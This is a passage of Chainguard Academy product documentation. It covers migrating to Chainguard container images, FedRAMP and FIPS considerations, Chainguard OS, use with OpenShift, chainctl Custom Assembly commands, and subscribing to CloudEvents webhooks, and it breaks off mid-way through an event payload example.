libxml2 (2.12.6-r0) (3/6) Installing php-8.2-config (8.2.18-r0) (4/6) Installing readline (8.2-r3) (5/6) Installing sqlite-libs (3.45.1-r0) (6/6) Installing php-8.2 (8.2.18-r0) OK: 66 MiB in 38 packages / # Although the -dev variants have similar security features as their distroless counterparts — such as complete SBOMs and signatures — they feature additional software that is typically not necessary in production environments. The general recommendation is to use the -dev variants only to build the application and then copy all application artifacts into a distroless image, which will result in a final container image that has a minimal attack surface and won’t allow package installations or logins. That being said, it’s worth noting that -dev variants of Chainguard Containers are completely fine to run in production environments. After all, the -dev variants are still more secure than many popular container images based on fully-featured operating systems such as Debian and Ubuntu since they carry less software, follow a more frequent patch cadence, and offer attestations for what they include. Install a Different Shell The -dev variants and chainguard-base image use the ash shell from BusyBox by default. This is nice from a minimalism perspective, but it’s not so great if you need to port a bash and Debian centric entrypoint script to Chainguard Containers. In these cases you have a choice — you can update your scripts to work in ash, or you can install the shell that works with your scripts. There’s no reason to be stuck on the ash shell if you really need bash or zsh. For example: docker run -it cgr.dev/$ORGANIZATION/chainguard-base 423450e3fd52:/# echo {1..5} {1..5} 423450e3fd52:/# apk add bash fetch https://packages.wolfi.dev/os/aarch64/APKINDEX.tar.gz (1/3) Installing ncurses-terminfo-base (6.4_p20231125-r1) (2/3) Installing ncurses (6.4_p20231125-r1) (3/3) Installing bash (5.2.21-r1) OK: 20 MiB in 17 packages 423450e3fd52:/# bash 423450e3fd52:/# echo {1..5} 1 2 3 4 5 423450e3fd52:/# Note that this example uses the chainguard-base image, which is only available as a paid Production Container. To follow along with this example, you would need to be part of an organization that has access to this image. Use apk search Following on from the last point, you’ll often need to install extra utilities to provide required dependencies for applications and scripts. These dependencies are likely to have different package names compared to other Linux distributions, so the apk search command can be very useful for finding the package you need. For example, say we are porting a Dockerfile that uses the groupadd command. We could convert this to the BusyBox addgroup equivalent, but it’s also perfectly fine to add the groupadd utility. The only issue is that there’s no groupadd package, so we have to search for it: docker run -it cgr.dev/$ORGANIZATION/chainguard-base ae154854dc6d:/# groupadd /bin/sh: groupadd: not found ae154854dc6d:/# apk add groupadd ERROR: unable to select packages: groupadd (no such package): required by: world[groupadd] ae154854dc6d:/# apk search groupadd shadow-4.15.1-r0 ae154854dc6d:/# apk add shadow (1/4) Installing libmd (1.1.0-r1) (2/4) Installing libbsd (0.12.2-r0) (3/4) Installing linux-pam (1.6.1-r0) (4/4) Installing shadow (4.15.1-r0) OK: 20 MiB in 18 packages ae154854dc6d:/# groupadd Usage: groupadd [options] GROUP Options: -f, --force exit successfully if the group already exists, and cancel -g if the GID is already used -g, --gid GID use GID for the new group -h, --help display this help message and exit -K, --key KEY=VALUE override /etc/login.defs defaults -o, --non-unique allow to create groups with duplicate (non-unique) GID -p, --password PASSWORD use this encrypted password for the new group -r, --system create a system account -R, --root CHROOT_DIR directory to chroot into -P, --prefix PREFIX_DIR directory prefix -U, --users USERS list of user members of this group Another useful trick is the cmd: syntax for finding packages that provide commands. For example, searching for ldd returns multiple results: ae154854dc6d:/# apk search ldd dpkg-dev-1.22.6-r0 nfs-utils-2.6.4-r1 posix-libc-utils-2.39-r1 But if we use the cmd: syntax we only get a single result: ae154854dc6d:/# apk search cmd:ldd posix-libc-utils-2.39-r1 And we can even use the syntax directly in apk add: ae154854dc6d:/# apk add cmd:ldd (1/4) Installing ncurses-terminfo-base (6.4_p20231125-r1) (2/4) Installing ncurses (6.4_p20231125-r1) (3/4) Installing bash (5.2.21-r1) (4/4) Installing posix-libc-utils (2.39-r1) OK: 27 MiB in 22 packages Watch Out for Entrypoint Differences In some cases, the entrypoint of Chainguard Containers can have a different behavior from their equivalent images based on other distros. This happens because many popular container images use an entrypoint script that allows running commands on the image through a shell. Since our images typically don’t have a shell by default, this can lead to unexpected behavior. For example, if you run Docker Hub’s official Python image, it opens the Python interpreter by default: docker run -it python Python 3.12.3 (main, Apr 10 2024, 11:26:46) [GCC 12.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> And the Chainguard Container works in the same way: docker run -it cgr.dev/chainguard/python Python 3.12.3 (main, Apr 9 2024, 16:36:34) [GCC 13.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> exit() But if you pass a Linux command to the Docker Hub image, it will be run from a shell: docker run -it python echo "in a shell" in a shell The Chainguard Python image doesn’t use an entrypoint script. It relies on the Python interpreter as single entrypoint for both the latest and the latest-dev variants. So instead of executing the command through a shell, it tries to parse the command as an argument to the Python interpreter: docker run -it cgr.dev/chainguard/python echo "in a shell" /usr/bin/python: can't open file '//echo': [Errno 2] No such file or directory The same behavior can be observed in the latest-dev variant, which does contain a shell, but uses the Python interpreter as entrypoint to keep consistency with the latest variant: docker run -it cgr.dev/chainguard/python:latest-dev echo "in a shell" /usr/bin/python: can't open file '//echo': [Errno 2] No such file or directory Other images, such as our WordPress container images, will have a different entrypoint behavior in their -dev variant to allow for customization and to facilitate migration from other base images. It’s important to always read the image’s documentation to understand how the entrypoint works, and if there are any major differences from other images you may be used to work with. Containers Don’t Run As root By Default Although there are exceptions, Chainguard Containers typically don’t run as the root user. The reason for this is that distroless containers should have no privileged capabilities, and containers that run as a non-root user and use a minimal seccomp profile are ideal from a security perspective. Because they don’t run as the root user, you may need to include a USER root statement in your Dockerfile before installing software on a Chainguard Container. Additionally, be aware that -dev images also do not run as root in most cases, which can result in permission errors like the following: docker run -it --entrypoint bin/bash chainguard/python:latest-dev bash-5.2$ mkdir test mkdir: can't create directory 'test': Permission denied bash-5.2$ sudo mkdir test bash: sudo: command not found In cases like this, you can instead run a command like the following to access the container’s shell as the root user: docker run -it --user root --entrypoint bin/bash chainguard/python:latest-dev Here, the --user option tells Docker to assume the root user role. Packages Not Found Container images are usually meant to support every possible use case. Because of this, they often contain packages that aren’t always necessary, which increases the container image’s attack surface and makes it more likely to contain CVEs. Chainguard Containers are built with minimalism in mind, and thus contain the bare minimum packages needed for an image to function. However, this also means that Chainguard Containers may not contain the packages that you’d expect to find in third-party alternatives. If a Chainguard Container is missing certain packages that are required for your application, we recommend using a base image and installing the required dependencies on top of it, preferably in a multi-stage Docker build. Our guides on How to Use Chainguard Containers and Getting Started with Distroless include guidance on how you can extend Chainguard base images. Alternatively, you can take advantage of Chainguard’s Custom Assembly and Private APK Repositories features to extend your container images. Custom Assembly allows users to create customers container images with extra packages added. This reduces their risk exposure by creating container images that are tailored to their internal organization and application requirements while still having few-to-zero CVEs. Private APK Repositories, meanwhile, allow customers to pull secure apk packages from Chainguard. The list of packages available in an organization’s private repository is based on the apk repositories that the organization already has access to. For example, say your organization has access to the Chainguard MySQL container image. Along with mysql, this image comes with other apk packages, including bash, openssl, and pwgen. This means that you’ll have access to these apk packages through your organization’s private APK repository, along with any others that appear in Chainguard container images that your organization has access to. In some cases you may have Docker builds that copy in binaries to run agents or similar tooling. You may find these binaries don’t work as expected as they are designed to run on a different Linux distribution. Be aware that Chainguard Containers may not have the dependencies required by third-party binaries, or they may be stored at a different path. Learn More For more resources on migrating ot Chainguard Containers, please refer to our Containers MIgration documentation. In particular, our Migration Overview may be of interest. Chainguard Academy also hosts a number of Compatibility Resources and Migration Guides for specific platforms and tools. --- ### FedRAMP Technical Considerations & Risk Factors URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/fedramp-considerations/ Last Modified: January 29, 2025 Tags: Chainguard Containers, Product, FIPS Many frequently asked questions revolve around how organizations are meant to stay on top of the changing landscape for FedRAMP, PMOS, Revisions, and Certificates. This article outlines various considerations and risk factors that organizations should keep in mind when working to become and stay FedRAMP authorized. Important Considerations for PMO Revision Trends There are a number of things one should keep in mind when analyzing revision trends from the FedRAMP Program Management Office (PMO) — which oversees the development of the FedRAMP program — and the changes in FIPS 140-3. The following are of particular importance: FedRAMP authorization has tended to only include external customer communication under scope. Now, though, the FedRAMP PMO is expecting both external and internal communications in scope. Customers will be now be required to provide an authorization boundary diagram with an associated network diagram that shows all FIPS encrypted flows: Anything that isn’t encrypted needs to be explicitly highlighted. Auditors will ask that these diagrams and flows not just show this but, in some cases, to prove this during the audit with observed testing scenarios. Notable Revision 5 Changes (Rev 5 - appendix queue): Customers must list every client and server communication in the infrastructure and which FIPS module is being used. DoD Security Technical Implementation Guides (STIGs) can be required, although CIS Level 2 benchmarks are accepted if a STIG does not exist, marking a change from Revision 4 which only required CIS Level 1 benchmarks. In order to get FIPS validated, libraries need to be assessed by one of thirteen authorized labs: National Institute of Standards and Technology (NIST) labs are overwhelmed, as there is a large influx of 140-2 demand but limited supply for approval on certification. While FIPS 140-3 is not immediately on the horizon for 2025, it will become the law of the land in 2026. As organizations begin analyzing their requirements and architecture constraints this year, it will be crucial to review and plan for the upcoming changes that are outlined in this section. Ongoing FIPS Maintenance Risks (and How Chainguard Can Help) An organization’s upfront FIPS configuration is important, but the real difficulties often come later on. While organizations frequently pass an audit with their initial configuration, there is a high level of risk associated with ongoing maintenance. This section highlights some of the risks associated with ongoing FIPS maintenance and how Chainguard can resolve them. Initial configuration vs continued maintenance risk The need to maintain FIPS across updates and versions with the dynamically changing nature of applications built on open source software within containers places a heavy burden on engineers. Likewise, the need to continuously validate cryptographic operations across various base images can pose significant risk to applications breaking or products going down across version updates and new releases. Additionally, certificates often expire and it is difficult to keep track of this at scale and update FIPS modules accordingly, presenting a heavy workload for compliance teams. Critical vulnerabilities often present themselves in the critical path for the organizations requiring a detailed Plan of Action and Milestones (POAM) and remediation efforts beyond the initial FIPS configuration. With Chainguard, there is a single partner to hold accountable, as we offer enterprise SLAS that can take the place of expensive and costly operations to do this manually. This includes 7 days for Critical, and 14 days for High, Medium, Low. This allows the initial CVE count to remain close to 0 during auditing events, but also accounts for any future CVEs that might show up within the ATO boundary. FIPS expertise and resource challenges Typically, an organization must oversee several key resources with advanced expertise to manage the ongoing configuration and maintenance of a FIPS or FedRAMP Authorization to Operate (ATO). However, this is not always translated across developers, application owners, and security teams. This problem scales with more images and boundaries under consideration. For a fixed fee per image, Chainguard will solve this problem by being directly responsible for the build and maintenance of all FIPS images in use, leveraging in-house expertise across a broad set of domains Quality testing for immediate use of Chainguard-provided FIPS images One of the hardest things to consider when moving an images program to leverage a CMVP-certified FIPS module is to accommodate all of the differences across programming languages and image types. To solve this, Chainguard provides not only the initial configuration, but the ongoing quality and functional testing across programming languages and application specific requirements for FIPS, to ensure that organizations only have to worry about running their services on these images. This includes a broad test suite across version updates while balancing the trade-offs between CVE fixes and limiting breaking changes to the running applications. Application-specific open source software While FIPS modules can be easier to implement within the base layer of an image, application-specific projects within the open source community are entirely maintained by the respective community maintainers and project owners. This means that FIPS considerations vary dramatically across these projects. Building these application images on top of existing FIPS-base images presents significant risk and additional cost associated with ensuring it is compliant through FTE efforts. Furthermore, many open source projects, such as Cassandra, cannot even support FIPS validation in their current state until they change the architecture and source code to be able to support this. Knowing which projects can support FIPS and which cannot is very useful in analyzing images within scope. Since Chainguard’s catalog consists of 100s of FIPS validated images, we have done the heavy lifting of this analysis, and continue to do so for new requests from our customers. Revision 5 Key Requirements Solved with Chainguard Container Images Using Chainguard Containers eliminates the manual toil of container security hassles. Hardened and low CVE images save you time and money by making sure you always meet the security standards needed for government work. The following table highlights the features of Chainguard Containers as mapped to FedRAMP Revision 5’s baselines: Additionally, Chainguard helps support CM-6 configuration settings requirements. Chainguard announced the release of a STIG for the General Purpose Operating System (GPOS) SRG which specifies security requirements for general purpose operating systems running in a network. The goal for this STIG is that it will help customers confidently and securely integrate Chainguard Containers into their workflows. Please refer to our STIGS Overview for more information. Kernel-Independent FIPS Container Images Cryptographic protection relies on the secure implementation of a trusted algorithm and a random bit generator that cannot be reasonably predicted at any greater accuracy than random chance. To certify these implementations, NIST operates a cryptographic certification program called the Cryptographic Module Validation Program (CMVP). CMVP validates that implementation is compliant with the relevant standards: For algorithm implementation, CMVP requires strict compliance with FIPS standards. Thus FIPS modules must sit inside a self-verified cryptographic boundary. For random bit generators, CMVP requires strict compliance with SP 800-90B recommendations and permits entropy sources to sit either inside or outside the FIPS cryptographic boundary. Traditionally, to meet these compliance requirements, containers would access an SP 800-90B compliant entropy source provided by a certified kernel, as in this diagram: This architecture drives significant friction for vendors delivering FIPS compliant workloads for modern cloud-native applications. First, very few versions of the Linux Kernel are certified. Second, Linux Kernel certification timelines are often long and arduous. Ultimately, this results in a very limited choice of certified runtimes and compatible underlying hardware for developers to build on. In practice, it means that a certified kernel from a given vendor might be over 5 years old. Outdated kernels typically lack support and optimizations for the latest generation of hardware, and are often incompatible with the latest cloud instance types. It also means when sticking to the same vendor, the application runtimes are equally as out of date and vulnerable. Chainguard’s solution has the FIPS module and the SP 800-90B entropy source co-located in the container image userspace. This eliminates the need for a certified Linux kernel for the majority of workloads and streamlines engineering effort for workload deployments. This is why Chainguard FIPS images now ship with a certified userspace SP 800-90B entropy source, as in this design: This means that the entropy source is now independent of the hardware or cloud environment. Essentially, you can have FIPS on any host OS, kernel, and hardware. You can even have FIPS on managed cloud kubernetes platforms like GKE, EKS, and AKS. Note that this solution has been tested by two NIST labs and certified with its own CMVP. For more information, please refer to the CVMP entries for Chainguard’s FIPS Modules and entropy source: OpenSSL FIPS 3.0 Provider Module (CVMP #4856) Bouncy Castle FIPS Java API (CMVP #4743 [historical: CMVP #4616]) Chainguard CPU Time Jitter RNG Entropy Source (ESV Entropy Certificate #E191) Additionally, check out our blog post on Kernel-Independent FIPS Containers. Conclusion While FIPS 140-2 has become relatively familiar to organizations, it still presents a set of complex challenges for those trying to achieve FedRAMP authorization. With the broad adoption of open source development on container images across development teams beginning to accelerate, the problem of configuring and maintaining FIPS modules within a broad suite of images becomes nearly intractable. Skill gaps and resource shortages further exacerbate the ability to keep up with this demand; and this problem will only get worse when 140-3 becomes the law of the land in 2026. The Rev-5 changes signal a continued trend in the market: as PMOs get better at understanding the state of modernized applications running on containers, and how the architectures interact with the services running, requirements are only becoming more granular. As a result, further documentation and proof will be required by organizations who are seeking to implement FIPS within their container environments. This puts pressure on organizations to fill skill gaps, increase the spend going towards FedRAMP programs, and de-risk ongoing assessments to maintain compliance. Chainguard offers an off-the-shelf solution for customers to run their applications on preconfigured and continuously maintained FIPS validated images so that they do not have to incur these costs or associated risks. As a result, Chainguard has helped customers achieve Moderate and High impact levels with very low engineering lift. With this comes the peace of mind knowing that you have a single partner responsible for building and supplying the key images needed to be successful in FedRAMP endeavours. --- ### Overview of Chainguard OS URL: https://edu.chainguard.dev/chainguard/chainguard-os/overview/ Last Modified: July 3, 2025 Tags: Chainguard OS, Product Chainguard OS was built in house to enable a more secure, agile, and efficient software distribution model, so that downstream products like container images could benefit from our organization’s approach. Chainguard OS adheres to four key principles: Continuous Integration and Delivery Nano Updates and Rebuilds Minimal, Hardened, Immutable Artifacts Delta Minimization On this page, we’ll discuss each of these components and how Chainguard OS differs from the operating system status quo. Continuous Integration and Continuous Delivery (CI/CD) Chainguard OS emphasizes the continuous integration, testing, and release of upstream software packages, ensuring a streamlined and efficient development pipeline through automation. Chainguard OS was built to privilege CI/CD of software artifacts so that thousands of independent (or loosely dependent) open source projects could be more securely built into hundreds of thousands of versioned “packages.” Unlike traditional distros, there is no major OS version (such as RHEL7 or Ubuntu 22.04 LTS) with a pinned catalog of packages; every available package is always installable with Chainguard OS while also accepting a wide range of packaging ecosystems, including all of the language-specific package managers beyond Chainguard OS’s own package manager. Leveraging event-driven automation, Chainguard OS ensures that every package in the catalog has a “release monitor” capturing new upstream releases right away. This monitor triggers automatic package recompiles, quality assurance and acceptance testing, security scanning, and publication. Chainguard container images that include that package will automatically benefit from updates due to our multi-layer approach that ships updated versions to relevant images. These packsges are also published to public and private registries at the same time. With Chainguard OS, users can rely on products that take advantage of an ever-growing catalog of open source and enterprise software packages. Rather than picking a favorite version of every software project every couple of years and attempting to maintain that for a decade or more, Chainguard OS takes a different approach: it enables continuous support and EOL for the same versions that the upstream project maintainers recommend. Nano Updates and Rebuilds Favoring incremental updates and rebuilds over major release upgrades, Chainguard OS supports smoother transitions that minimize disruptive changes. Our goal is for engineers adopting Chainguard products to never have to think about major OS version upgrades that dominate a roadmap for months at a time every two years. Through continuously introduced daily nano upgrades, paced through staging and testing gates, any offending regression can be readily pinpointed, reported, and addressed in subsequent updates hours or days later. Both minor “updates” and major “upgrades” are simultaneously delivered through Chainguard OS. Chainguard Containers offer clear, firm, and distinct boundaries for each application, so that updates and upgrades are cleaner. Chainguard OS takes advantage of the ephemeral application layer of container images being separate from the persistent storage and unique configuration data; it is able to simultaneously instantiate new containers running the updated and upgraded application and destroy the previous instantiation running the down-level application version. In this way, updates (patches) and upgrades (major changes) are introduced instantly, and rollbacks to previous versions can be done by launching the previous container’s image. Minimal, Hardened, Immutable Artifacts Chainguard OS produces container images that are minimal in scope, stripped of non-essential components, and hardened for secure use in production environments. The resulting artifacts are immutable and designed to include only the dependencies necessary for a given application to run. Unlike traditional Linux distributions, which aim to be general-purpose and include a wide range of libraries and utilities, Chainguard OS builds application systems: minimal containers tailored to the specific runtime requirements of a single application. Optional complementary tools and packages can be added as needed, but they are not included by default. This design reduces the system’s overall attack surface, improves performance by eliminating unused software, and supports strict control over what is present in a given execution environment. All images are produced through hardened build processes and are validated against defined security policies. Delta Minimization Chainguard OS maintains a close alignment with upstream open source projects. Extra patches are introduced only when necessary, such as for addressing critical issues or applying hardening measures, and are kept in place only until equivalent changes are integrated upstream. This approach reduces long-term maintenance overhead and avoids divergence from upstream. Chainguard OS implements frequent, incremental updates (what we call nano updates, discussed in the section above) that closely track upstream releases. These updates are designed to preserve the intent and behavior of the original software while delivering improvements and security fixes on an almost daily cadence. By integrating changes continuously and aligning with upstream maintainers’ development cycles, Chainguard OS ensures compatibility and reduces the risk of regressions. This model also helps downstream consumers benefit from the most recent updates without requiring wholesale system upgrades. Advantages of Chainguard OS Chainguard OS is a minimal Linux-based operating system designed to support more secure deployment of containerized applications. It integrates tightly with Chainguard tooling to provide measurable improvements in vulnerability management, compliance, and software supply chain integrity. Vulnerability Management Chainguard OS minimizes exposure to known vulnerabilities by automating detection, triage, and remediation processes. It continuously rebuilds included applications and dependencies using up-to-date toolchains and a hardened image pipeline. The OS includes only essential packages, reducing the attack surface. Continuous Compliance The system architecture and toolchain used in Chainguard OS support the automation of compliance efforts. By consistently regenerating software artifacts in a controlled environment, Chainguard OS ensures that applications and their dependencies remain compliant with common security and regulatory frameworks. Software Supply Chain Security All software components in Chainguard OS are built from source in the Chainguard Factory — a hardened build environment that conforms to SLSA standards. This process mitigates risks of tampering in the build and delivery pipeline. The system also generates cryptographically verifiable artifacts, including signed Software Bills of Materials (SBOMs) and provenance metadata. Operational Efficiency By integrating upstream open source updates directly into the build and delivery process, Chainguard OS reduces the need for manual patching and vulnerability triage. Engineering teams can allocate resources toward feature development rather than maintenance overhead. System Architecture and Design Philosophy Traditional Linux distributions often bundle a broad set of packages and features, which can introduce unnecessary complexity and security risk. Chainguard OS adopts a minimal and purpose-built approach, optimized for containerized environments. The operating system is built to take advantage of modern containerization practices and supports declarative, reproducible builds. Combined with automated tooling, this design enables consistent delivery of secure, traceable container images. Chainguard OS is not intended as a general-purpose distribution; instead, it serves as a foundational layer for secure application workloads, particularly in environments that require strict controls on software provenance, compliance, and runtime behavior. --- ### How to Use Chainguard Containers with OpenShift URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/use-with-openshift/ Last Modified: June 17, 2025 Tags: Chainguard Containers, OpenShift, Product In this guide, you’ll find general instructions for how to get started using Chainguard Containers on Red Hat OpenShift Container Platform. Red Hat OpenShift is an application platform that orchestrates and manages your systems and resources. While it is based on open source software like Kubernetes, OpenShift includes a suite of applications with additional functionality that are configured to work together. Adding Chainguard Containers to your OpenShift deployment saves you the effort of CVE remediation and speeds up your security and compliance efforts. When Using Chainguard Containers with OpenShift, there are some adjustments that need to be made to the usual process. This guide provides guidance. See the OpenShift docs for more details. Adjust Ownership and Permissions By default, OpenShift Container Platform runs containers using an arbitrarily assigned User ID (UID), as described in the Red Hat documentation. There are required access settings for an image to support running as an arbitrary user: Directories and files that are written to by processes in the image must be owned by the root group and that group must have both read and write permissions Files that will be executed must also have group execute permissions Following the Red Hat requirements, to use Chainguard Containers you must make a change in your Dockerfile to set the required ownership and permissions. For example, if you have one or more files that you need to execute stored in /some/directory, then you would do this: RUN chgrp -R 0 /some/directory && \ chmod -R g=u /some/directory Create /app Directory and HOME When running on OpenShift clusters, you will find that the OpenShift user cannot create config files inside their home directory. This is because OpenShift is designed to start container instances using a random User ID. To avoid this being an issue when using Chainguard Containers: Set a HOME variable for the user (it would otherwise be set as / for root) Create an /app directory in every Dockerfile Set /app directory permissions to 755 and ownership to 65532:0 This can help you avoid or limit switching to the root user during the build phase when no package installation is required. Here’s a sample Dockerfile covering this process. # Change this to reference the image you want to pull and # if needed, to use the location of your custom image repo FROM cgr.dev/$ORGANIZATION/aspnet-runtime-db:9 USER 0 RUN mkdir -m 775 /app && chown -R 65532:0 /app COPY --chown=65532:0 src/Sample.Service/bin/Release/net9.0/publish /app USER 65532 WORKDIR /app ENV HOME=/app ENTRYPOINT ["dotnet", "Sample.Service.dll"] Use Special Container Images for Hard-coded User IDs There are cases where Red Hat hard codes UIDs for specific applications, for example, the user for Postgres is set to UID 26. See the Red Hat documentation for more details. In this instance, Chainguard has built a special image for Postgres on OpenShift with a different release tag. Where the Postgres release version is 17.5 and the regular Chainguard Container would be released with the tag 17.5, there is another image released with the tag 17.5-openshift. Understand Security Context Constraints (SCCs) OpenShift Container Platform includes security context constraints (SCCs) that you can use to control permissions for the pods in your cluster. SCCs determine the actions that a pod can perform and what resources it can access. SCCs in OpenShift will by default prevent a root user from running with the Chainguard Containers -dev variants. --- ### Using chainctl to Manage Custom Assembly Resources URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/ca-docs/custom-assembly-chainctl/ Last Modified: May 1, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s Custom Assembly is a tool that allows customers to create customized containers with extra packages added. This enables customers to reduce their risk exposure by creating container images that are tailored to their internal organization and application requirements while still having few-to-zero CVEs. You can use chainctl, Chainguard’s command-line interface tool, to further customize your Custom Assembly builds and retrieve information about them. This guide provides an overview of the relevant chainctl commands and outlines how you can edit the configuration of Custom Assembly containers, as well as retrieve a list of a customized image’s builds and its build logs. Editing a Customized Container Image To edit one of your organization’s Custom Assembly container images, you can run the chainctl image repo build edit command: chainctl image repo build edit --parent $ORGANIZATION --repo $CUSTOMIZED_CONTAINER This example includes the --parent flag, which points to the name of your organization, and the --repo argument, which points to the name of your customized image. If you omit these arguments, chainctl will prompt you to select your organization and customized image interactively. This command will open up a file with your machine’s default text editor. This file will contain a structure like the following: contents:packages:- yarn- wgetEdit this file by adding or removing any packages you like. Then, save and close the file. Before applying the change, chainctl will outline the changes you made and prompt you to confirm that you want to move forward with the change: /tmp/3352123767.yaml (-deletion / +addition): contents: packages: - yarn - - wget + - bash Applying build config to custom-node Are you sure? Do you want to continue? [y,N]: Enter y to apply the changes. Following that, you’ll be able to see the updated builds in the Chainguard Console, though it may take a few minutes for these changes to populate. To edit a customized container image without any interactivity, you can use the apply subcommand. This method requires you to have a YAML file listing the desired packages, like the example created with this command: cat > build.yaml <<EOF contents: packages: - bash - curl - mysql EOF Then include this file in the apply command by adding the -f argument: chainctl image repo build apply -f build.yaml --parent chainguard.edu --repo custom-assembly --yes This command will again ask you to confirm that you want to apply the new configuration. To make this example completely declarative, this example includes --yes to automatically confirm the changes: Applying build config to custom-assembly (*v1.CustomOverlay)(Inverse(protocmp.Transform, protocmp.Message{ "@type": s"chainguard.platform.registry.CustomOverlay", "contents": protocmp.Message{ "@type": s"chainguard.platform.registry.ImageContents", "packages": []string{ - "wolfi-base", + "bash", - "go", + "curl", + "mysql", }, }, })) Are you sure? Do you want to continue? [y,N]: This approach is useful in cases where you would prefer to avoid any kind of interactivity, as in a CI/CD or other automation system. Retrieving Information about Custom Assembly Containers You can also use the list subcommand to retrieve every one of a customized image’s builds from the past 24 hours: chainctl image repo build list --parent $ORGANIZATION --repo $REPO This command is useful for quickly determining which builds were successful or failed: START TIME | COMPLETION TIME | RESULT | TAGS --------------------------------+-------------------------------+---------+--------------------------------------------- Thu, 01 May 2025 10:10:40 PDT | Thu, 01 May 2025 10:10:45 PDT | Success | 20, 20.19, 20.19.1 Thu, 01 May 2025 10:10:34 PDT | Thu, 01 May 2025 10:10:46 PDT | Success | 22-slim, 22.15-slim, 22.15.0-slim Thu, 01 May 2025 10:10:33 PDT | Thu, 01 May 2025 10:10:41 PDT | Success | 23, 23.11, 23.11.0, latest . . . Lastly, you can also retrieve the logs for a given build with the logs subcommand: chainctl image repo build logs --parent $ORGANIZATION --repo $REPO This command will prompt you to select the build report you want to view. These are organized in reverse chronological order by the time of each build: Select a build report to view logs: Wed, 16 Apr 2025 16:36:52 PDT - Wed, 16 Apr 2025 16:37:08 PDT Success (18-dev, 18.20-dev, 18.20.8-dev) > Wed, 16 Apr 2025 16:36:45 PDT - Wed, 16 Apr 2025 16:37:00 PDT Success (20-dev, 20.19-dev, 20.19.0-dev) Wed, 16 Apr 2025 16:36:42 PDT - Wed, 16 Apr 2025 16:36:52 PDT Success (18, 18.20, 18.20.8) Wed, 16 Apr 2025 16:36:41 PDT - Wed, 16 Apr 2025 16:36:51 PDT Success (22-slim, 22.14-slim, 22.14.0-slim) Wed, 16 Apr 2025 16:36:32 PDT - Wed, 16 Apr 2025 16:36:57 PDT Success (22-dev, 22.14-dev, 22.14.0-dev) Wed, 16 Apr 2025 16:36:32 PDT - Wed, 16 Apr 2025 16:36:44 PDT Success (20-slim, 20.19-slim, 20.19.0-slim) Wed, 16 Apr 2025 16:36:29 PDT - Wed, 16 Apr 2025 16:36:41 PDT Success (23-slim, 23.11-slim, 23.11.0-slim) Wed, 16 Apr 2025 16:36:19 PDT - Wed, 16 Apr 2025 16:36:29 PDT Success (23, 23.11, 23.11.0, latest) Wed, 16 Apr 2025 16:36:09 PDT - Wed, 16 Apr 2025 16:36:42 PDT Success (23-dev, 23.11-dev, 23.11.0-dev, latest-dev) Wed, 16 Apr 2025 16:36:09 PDT - Wed, 16 Apr 2025 16:36:31 PDT Success (20, 20.19, 20.19.0) Wed, 16 Apr 2025 16:36:09 PDT - Wed, 16 Apr 2025 16:36:31 PDT Success (22, 22.14, 22.14.0) Wed, 16 Apr 2025 16:36:09 PDT - Wed, 16 Apr 2025 16:36:18 PDT Success (18-slim, 18.20-slim, 18.20.8-slim) Wed, 16 Apr 2025 16:35:35 PDT - Wed, 16 Apr 2025 16:35:47 PDT Success •••••••••••••• ↑/k up • ↓/j down • / filter • q quit • ? more Highlight your chosen build report and select it by pressing ENTER. This will open up the build’s logs: 2025-04-17T16:00:08-07:00[INFO]Building image with locked configuration: {Contents:{BuildRepositories:[] RuntimeRepositories:[https://apk.cgr.dev/45a0c61eEXAMPLEf050c5fb9ac06a69eed764595] Learn More The chainctl commands outlined in this guide show how you can interact with Chainguard’s Custom Assembly tool from the command line. You can also interact with Custom Assembly with the Chainguard API. Our tutorial on Using the Chainguard API to Manage Custom Assembly Resources outlines how to run a demo application that updates the configuration of a Custom Assembly container through the Chainguard API. --- ### Subscribing to Chainguard CloudEvents URL: https://edu.chainguard.dev/chainguard/administration/cloudevents/events-example/ Last Modified: April 25, 2025 Tags: Product, CloudEvents, Procedural Chainguard implements CloudEvents, a specification for a standard format for events data. This means developers can use events (generated based on interactions with Chainguard resources) to initiate processes and thus automate certain actions. For example, you could set up infrastructure to listen for push events to an organization’s private registry and mirror any new Chainguard Containers in the registry to a third-party repository. This article includes an example of how to use chainctl to create an event subscription. It also includes details on how to validate events from Chainguard and highlights some potential use cases for them. This article is primarily focused on Registry push and pull events. Push events occur when an image in your entitlement is added or updated. Pull events occur when an image is pulled from your Chainguard repository. Be aware, though, that there are also events related to IAM, such as user creation and adding identity providers. Subscribing to Events To subscribe to Chainguard events for your account, use the following chainctl command: chainctl events subscriptions create https://<Your webhook URL> The webhook URL should connect to a service that you use to process the requests. This can use whatever infrastructure works for your team, but a common choice is to use a serverless service such as AWS Lambda or Google Cloud Run. As an example, this guide uses Webhook.site. This is an open-source application that will generate a URL you can use to receive, send, and transform webhooks, among other actions. Webhook.site can be self-hosted, but for the purposes of this guide you can just use the cloud version of the application. Note: You can also try this out with alternative webhook testing sites, like smee.io. Once you have the webhook URL, use a chainctl command similar to the following to set up a subscription to events for your account: chainctl events subscriptions create https://webhook.site/aEXAMPLE-b689-49a5-94df-f1dEXAMPLE29 Select the organization whose events you want to subscribe to when prompted. If successful, this returns an ID for the subscription: ✔ Selected folder chainguard.edu. ID | SINK ------------------------------------------------------------+------------------------------------------------------------ 45a0cEXAMPLE977f050c5fb9EXAMPLEeed764595/91b3cdEXAMPLE7a6 | https://webhook.site/aEXAMPLE-b689-49a5-94df-f1dEXAMPLE29 In order to generate an event, try pulling an image from your organization’s repository within the Chainguard registry: docker pull cgr.dev/chainguard.edu/istio-pilot:1-dev Be sure to change this command to use your own organization’s repository and an image you have access to. 7.0.10: Pulling from chainguard.edu/istio-pilot Digest: sha256:5a4583fb12ee4b33306a2c23ff33c9f2d04e6d1c7580703850928abf50de5dcf Status: Image is up to date for cgr.dev/chainguard.edu/istio-pilot:1-dev cgr.dev/chainguard.edu/istio-pilot:1-dev Then, navigate back to Webhook.site. It may take a few moments, but in time an event will appear with request content like the following: { "actor": { "subject": "261ea43771f4d962f17c1d206155a38b9b17ff18", "act": { "aud": "Hvqy7yoEhI8TY1zX9rPrsdcIntDz9yh2", "aws-acct": "", "aws-arn": "", "email": "", "iss": "https://auth.chainguard.dev/", "sub": "google-oauth2|117799788801679028930" } }, "body": { "repository": "chainguard.edu/istio-pilot", "repo_id": 